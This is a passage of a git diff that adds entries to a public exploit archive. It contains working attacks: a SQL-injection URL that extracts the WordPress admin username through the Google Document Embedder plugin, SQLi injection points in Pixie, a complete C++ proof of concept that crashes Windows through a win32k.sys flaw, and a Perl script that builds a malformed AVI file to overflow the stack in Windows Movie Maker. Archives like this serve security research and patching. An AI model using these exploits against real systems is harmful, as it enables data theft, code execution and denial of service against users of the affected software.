+378	$profile = unserialize($profile[0]['profile_data']);
+379	
+380	if ( is_array($profile) ) {
+381		return $profile;
+382	} else {
+383		return false;
+384	}
+385 }
+================================================================
+
+2. POC
+http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1
+
+3. Solution:
+Not patched
+
+4. Discovered By : Securely(Yoo Hee man)
+                 God2zuzu@naver.com
\ No newline at end of file
diff --git a/platforms/php/webapps/35451.txt b/platforms/php/webapps/35451.txt
new file mode 100755
index 000000000..87973b4c7
--- /dev/null
+++ b/platforms/php/webapps/35451.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46861/info
+
+Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/categories.php?path=[sqli]
\ No newline at end of file
diff --git a/platforms/php/webapps/35452.txt b/platforms/php/webapps/35452.txt
new file mode 100755
index 000000000..75890445f
--- /dev/null
+++ b/platforms/php/webapps/35452.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46861/info
+ 
+Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+ 
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+ 
+http://www.example.com/list.php?path=[sqli]
\ No newline at end of file
diff --git a/platforms/php/webapps/35453.txt b/platforms/php/webapps/35453.txt
new file mode 100755
index 000000000..540c94ca1
--- /dev/null
+++ b/platforms/php/webapps/35453.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46861/info
+  
+Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+  
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+  
+http://www.example.com/search.php?advCat=[sqli]
+
+http://www.example.com/search.php?advComp=[sqli]
\ No newline at end of file
diff --git a/platforms/php/webapps/35454.txt b/platforms/php/webapps/35454.txt
new file mode 100755
index 000000000..486a0dea9
--- /dev/null
+++ b/platforms/php/webapps/35454.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46861/info
+   
+Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+   
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+   
+http://www.example.com/rss/rss_news.php?lang=[sqli]
\ No newline at end of file
diff --git a/platforms/windows/local/35326.cpp b/platforms/windows/local/35326.cpp
new file mode 100755
index 000000000..ccdbf24c9
--- /dev/null
+++ b/platforms/windows/local/35326.cpp
@@ -0,0 +1,318 @@
+# Exploit Title: Microsoft Windows Win32k.sys Denial of Service
+# Date: 20-11-2014
+# Exploit Author: Kedamsky (kedamsky@mail.ru)
+# Vendor Homepage: http://microsoft.com
+# Software Link: http://www.microsoft.com/en-us/download/windows.aspx
+# Version: XP SP3, Vista SP2, 7 SP1, 8, 8.1 (x86/x64)
+# Tested on: [XP to 8.1 x86/x64]
+
+Microsoft Windows win32k.sys DoS exploit
+by Kedamsky
+mailto:kedamsky@mail.ru
+
+
+=========================
+Vulnerability Description
+=========================
+
+The vulnerability exists in the function win32k!xxxMenuWindowProc. It
+calls the function win32k!xxxMNOpenHierarchy that can return valid
+pointer to data and 0 or -1 otherwise. The function
+win32k!xxxMenuWindowProc does not validate the result of
+win32k!xxxMNOpenHierarchy properly and it is possible to try to read
+data from address -1.
+
+
+===============
+Vulnerable code
+===============
+8f584e72 85c0 test eax,eax
+8f584e74 0f84f7040000 je win32k!xxxMenuWindowProc+0xf00 (8f585371)
+8f584e7a 8b00 mov eax,dword ptr [eax] ; <-- eax = -1
+...
+8f584fa9 e8b2320000 call win32k!xxxMNOpenHierarchy (8f588260)
+8f584fae e9bffeffff jmp win32k!xxxMenuWindowProc+0xa01 (8f584e72)
+
+
+================
+Typical bugcheck
+================
+
+*******************************************************************************
+* *
+* Bugcheck Analysis *
+* *
+*******************************************************************************
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced. This cannot be protected by try-except,
+it must be protected by a Probe. Typically the address is just plain bad or it
+is pointing at freed memory.
+Arguments:
+Arg1: ffffffff, memory referenced.
+Arg2: 00000000, value 0 = read operation, 1 = write operation.
+Arg3: 8f584e7a, If non-zero, the instruction address which referenced the bad memory
+address.
+Arg4: 00000000, (reserved)
+
+Debugging Details:
+------------------
+
+
+READ_ADDRESS: ffffffff 
+
+FAULTING_IP: 
+win32k!xxxMenuWindowProc+a09
+8f584e7a 8b00 mov eax,dword ptr [eax]
+
+MM_INTERNAL_CODE: 0
+
+IMAGE_NAME: win32k.sys
+
+DEBUG_FLR_IMAGE_TIMESTAMP: 49e01b60
+
+MODULE_NAME: win32k
+
+FAULTING_MODULE: 8f480000 win32k
+
+DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
+
+BUGCHECK_STR: 0x50
+
+PROCESS_NAME: DOS3_1E3.exe
+
+CURRENT_IRQL: 2
+
+TRAP_FRAME: 9a862b64 -- (.trap 0xffffffff9a862b64)
+ErrCode = 00000000
+eax=ffffffff ebx=fe630478 ecx=9a862ba8 edx=9a862d14 esi=8f663c40 edi=fe816270
+eip=8f584e7a esp=9a862bd8 ebp=9a862c64 iopl=0 nv up ei ng nz na pe nc
+cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
+win32k!xxxMenuWindowProc+0xa09:
+8f584e7a 8b00 mov eax,dword ptr [eax] ds:0023:ffffffff=????????
+Resetting default scope
+
+LAST_CONTROL_TRANSFER: from 81b0ec83 to 81aeca98
+
+STACK_TEXT: 
+9a8626b4 81b0ec83 00000003 8d3d2bb2 00000000 nt!RtlpBreakWithStatusInstruction
+9a862704 81b0f769 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c
+9a862ad0 81ad936d 00000050 ffffffff 00000000 nt!KeBugCheck2+0x66d
+9a862b4c 81a8edb4 00000000 ffffffff 00000000 nt!MmAccessFault+0x10a
+9a862b4c 8f584e7a 00000000 ffffffff 00000000 nt!KiTrap0E+0xdc
+9a862c64 8f536f57 fe816270 000001e3 00000000 win32k!xxxMenuWindowProc+0xa09
+9a862ca4 8f506a54 fe816270 000001e3 00000000 win32k!xxxSendMessageTimeout+0x1d4
+9a862ccc 8f4f6cc8 fe816270 000001e3 00000000 win32k!xxxWrapSendMessage+0x1c
+9a862ce8 8f53de69 fe816270 000001e3 00000000 win32k!NtUserfnDWORD+0x27
+9a862d20 81a8bc7a 000201e8 000001e3 00000000 win32k!NtUserMessageCall+0xc6
+9a862d20 777e5e74 000201e8 000001e3 00000000 nt!KiFastCallEntry+0x12a
+0035f470 76368e7d 763621bd 000201e8 000001e3 ntdll!KiFastSystemCallRet
+0035f474 763621bd 000201e8 000001e3 00000000 USER32!NtUserMessageCall+0xc
+0035f4b0 7635f99f 00a96270 000001e3 00000000 USER32!SendMessageWorker+0x4d5
+0035f4d0 001010c2 000201e8 000001e3 00000000 USER32!SendMessageA+0x7c
+0035f4e8 76382336 00000004 000201f6 00000000 DOS3_1E3!HookProc+0x22
+0035f51c 76369c66 000a0004 000201f6 00000000 USER32!DispatchHookA+0x100
+0035f55c 76360e8e 0035f598 00000000 0035f5a8 USER32!CallHookWithSEH+0x21
+0035f580 777e5dae 0035f598 00000018 0035f664 USER32!__fnHkINDWORD+0x24
+0035f5ac 76380cf3 00101198 001f00f5 00000000 ntdll!KiUserCallbackDispatcher+0x2e
+0035f5b0 00101198 001f00f5 00000000 00000014 USER32!NtUserTrackPopupMenuEx+0xc
+0035f5d0 7636fd72 000201f6 00000111 00009876 DOS3_1E3!WndProc+0x68
+0035f5fc 7636fe4a 00101130 000201f6 00000111 USER32!InternalCallWinProc+0x23
+0035f674 76370943 00000000 00101130 000201f6 USER32!UserCallWinProcCheckWow+0x14b
+0035f6b4 76370b36 00a978d0 00a97800 00009876 USER32!SendMessageWorker+0x4b7
+0035f6d4 76394c23 000201f6 00000111 00009876 USER32!SendMessageW+0x7c
+0035f6ec 76394d23 00a9a640 00000000 00a9a640 USER32!xxxButtonNotifyParent+0x41
+0035f708 763849d3 0042dd64 00000001 00000000 USER32!xxxBNReleaseCapture+0xf7
+0035f78c 76372af0 00a9a640 00000202 00000000 USER32!ButtonWndProcWorker+0x910
+0035f7ac 7636fd72 000201ec 00000202 00000000 USER32!ButtonWndProcA+0x4c
+0035f7d8 7636fe4a 763767fa 000201ec 00000202 USER32!InternalCallWinProc+0x23
+0035f850 7637018d 00000000 763767fa 000201ec USER32!UserCallWinProcCheckWow+0x14b
+0035f8b4 76368b7c 763767fa 00000001 0035f920 USER32!DispatchMessageWorker+0x322
+0035f8c4 0010131d 0035f904 00000000 00000000 USER32!DispatchMessageA+0xf
+0035f920 00101460 00100000 00000000 003f1b04 DOS3_1E3!WinMain+0x16d
+0035f96c 7747d0e9 7ffdb000 0035f9b8 777c19bb DOS3_1E3!__tmainCRTStartup+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 238]
+0035f978 777c19bb 7ffdb000 77b31ea1 00000000 kernel32!BaseThreadInitThunk+0xe
+0035f9b8 777c198e 00101359 7ffdb000 00000000 ntdll!__RtlUserThreadStart+0x23
+0035f9d0 00000000 00101359 7ffdb000 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+
+STACK_COMMAND: kb
+
+FOLLOWUP_IP: 
+win32k!xxxMenuWindowProc+a09
+8f584e7a 8b00 mov eax,dword ptr [eax]
+
+SYMBOL_STACK_INDEX: 5
+
+SYMBOL_NAME: win32k!xxxMenuWindowProc+a09
+
+FOLLOWUP_NAME: MachineOwner
+
+FAILURE_BUCKET_ID: 0x50_win32k!xxxMenuWindowProc+a09
+
+BUCKET_ID: 0x50_win32k!xxxMenuWindowProc+a09
+
+Followup: MachineOwner
+---------
+
+
+================
+Proof of Concept
+================
+
+//#include "stdafx.h"
+#include <windows.h>
+
+#define BSOD_BUTTON 0x9876
+
+HMENU hMenu[3];
+ULONG MenuLevel = 0;
+HWND hTargetMenuWnd = 0;
+
+void KeyEvent()
+{
+	INPUT input;
+	memset(&input, 0, sizeof(input));
+ 	input.type = INPUT_KEYBOARD;
+	input.ki.wVk = VkKeyScanA('1');
+ 
+ 	SendInput(1, &input, sizeof(input));
+
+ 	Sleep(50);
+ 
+ 	memset(&input, 0, sizeof(input));
+	input.type = INPUT_KEYBOARD;
+	input.ki.wVk = VkKeyScanA('1');
+	input.ki.dwFlags = KEYEVENTF_KEYUP;
+	SendInput(1, &input, sizeof(input));
+}
+
+LRESULT CALLBACK HookProc(
+	int nCode, 
+	WPARAM wParam,
+	LPARAM lParam)
+{
+	if (nCode == HSHELL_WINDOWACTIVATED && hTargetMenuWnd != NULL)
+	{
+		return SendMessage(hTargetMenuWnd, 0x1E3, 0, 0);
+	}
+
+	return 0;
+}
+
+VOID CALLBACK WinEventProc(
+	HWINEVENTHOOK hWinEventHook, 
+	DWORD event, 
+	HWND hWnd, 
+	LONG idObject, 
+	LONG idChild, 
+	DWORD idEventThread, 
+	DWORD dwmsEventTime)
+{
+	++MenuLevel;
+		
+	if (MenuLevel == 1)
+	{
+		KeyEvent();
+	}
+	else if (MenuLevel == 2)
+	{
+		SetWindowsHookEx(WH_SHELL, HookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
+			
+		hTargetMenuWnd = hWnd;
+		SendMessage(hTargetMenuWnd, 0x1F2, 0, 0);
+	}
+}
+
+LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
+{
+	switch (message)
+	{
+	case WM_COMMAND:
+		if (LOWORD(wParam) == BSOD_BUTTON)
+		{
+			SetWinEventHook(
+				EVENT_SYSTEM_MENUPOPUPSTART, 
+				EVENT_SYSTEM_MENUPOPUPSTART,
+				GetModuleHandleA(NULL),
+				WinEventProc,
+				GetCurrentProcessId(),
+				GetCurrentThreadId(),
+				WINEVENT_OUTOFCONTEXT);
+
+			TrackPopupMenuEx(hMenu[0], 0, 20, 20, hWnd, NULL);
+		}
+	case WM_DESTROY:
+		PostQuitMessage(0);
+		break;
+	default:
+		return DefWindowProcA(hWnd, message, wParam, lParam);
+	}
+
+	return 0;
+}
+
+int APIENTRY WinMain(
+	_In_ HINSTANCE hInstance, 
+	_In_opt_ HINSTANCE hPrevInstance, 
+	_In_ PSTR lpCmdLine, 
+	_In_ int nCmdShow)
+{
+    WNDCLASSA Class;
+    Class.style = 0;
+    Class.lpfnWndProc = WndProc;
+    Class.cbClsExtra = 0;
+    Class.cbWndExtra = 0;
+    Class.hInstance = GetModuleHandleA(NULL);
+    Class.hIcon = NULL;
+	Class.hCursor = LoadCursor(0, IDC_ARROW);
+    Class.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
+    Class.lpszMenuName = NULL;
+    Class.lpszClassName = "MyWinClass";
+
+	if (RegisterClassA(&Class) != NULL)
+	{
+		HWND hMainWnd = CreateWindowA(
+			"MyWinClass", 
+			"Microsoft Windows Win32k.sys Denial of Service Vulnerability", 
+			WS_POPUPWINDOW | WS_BORDER | WS_CAPTION | WS_VISIBLE, 
+			0, 0, 500, 200, 
+			NULL, 
+			NULL, 
+			hInstance, 
+			NULL);
+
+		if (hMainWnd != NULL)
+		{
+			HWND hButton = CreateWindowA(
+				"Button", 
+				"Click me to see BSOD", 
+				WS_VISIBLE | WS_CHILD | BS_DEFPUSHBUTTON, 
+				150, 50, 200, 50, 
+				hMainWnd, 
+				(HMENU)BSOD_BUTTON, 
+				hInstance, 
+				NULL);
+		
+			if (hButton != 0)
+			{
+				hMenu[0] = CreatePopupMenu();
+				hMenu[1] = CreatePopupMenu();
+				hMenu[2] = CreatePopupMenu();
+
+				AppendMenuA(hMenu[0], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[1], "1");
+				AppendMenuA(hMenu[1], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[2], "1");
+				AppendMenuA(hMenu[2], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)0, "1");
+
+				MSG msg;
+				while (GetMessage(&msg, NULL, 0, 0))
+				{
+					TranslateMessage(&msg);
+					DispatchMessage(&msg);
+				}
+			}
+		}
+	}
+    
+    return 0;
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/35434.txt b/platforms/windows/remote/35434.txt
new file mode 100755
index 000000000..430bfcd9e
--- /dev/null
+++ b/platforms/windows/remote/35434.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46816/info
+
+WebKit is prone to a cross-domain scripting vulnerability because it fails to properly enforce the same-origin policy.
+
+Successfully exploiting this issue will allow attackers to send the content of arbitrary files from the user's system to a remote server controlled by them. This results in disclosure of potentially sensitive information which may aid in further attacks. 
+
+http://www.exploit-db.com/sploits/35434.zip
\ No newline at end of file
diff --git a/platforms/windows/remote/35446.pl b/platforms/windows/remote/35446.pl
new file mode 100755
index 000000000..147a68e29
--- /dev/null
+++ b/platforms/windows/remote/35446.pl
@@ -0,0 +1,62 @@
+source: http://www.securityfocus.com/bid/46835/info
+
+Windows Movie Maker is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
+
+Windows Movie Maker 2.1.4026 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+
+###
+# Title : Windows Movie Maker 2.1 (Import AVI video) Stack Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : Stack Overflow in 'moviemk.exe' Process
+# Tested on : Windows XP SP3 Fran?ais 
+# Target : Windows Movie Maker 2.1.4026
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# Usage : 1 - Creat AVI file
+#    =>    2 - Impoter AVI file in WMM 2.1
+#     =>    3 -  OverFlow !!!
+# Assembly Errur : {
+# [div] exa ,ecx ; 0x74872224 "\xf7\xf1"
+# [int] ; 0x41 * 515 bytes
+# }
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";                  
+print "    |===========================================================|\n";
+print "    |= [!] Name : Windows Movie Maker 2.1 (Import AVI video)   =|\n";
+print "    |= [!] Exploit : Stack Buffer Overflow                     =|\n";
+print "    |= [!] Author : KedAns-Dz                                  =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
+print "    |===========================================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; # AVI Header
+my $Junk = "\x41" x 515 ; # Junk
+open(file , ">", "Kedans.avi"); # Evil Video AVI (529 bytes) 4.0 KB
+print file $PoC.$Junk;  
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);  
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
+# Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=>
+# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX 
+# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends .
+# Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah 
+# Messas Secondary School - Ain mlilla - 04300 - Algeria
+# hotturks.org : TeX * KadaVra ... all Others
+# Kelvin.Xgr ( kelvinx.net)
+#===========================================================================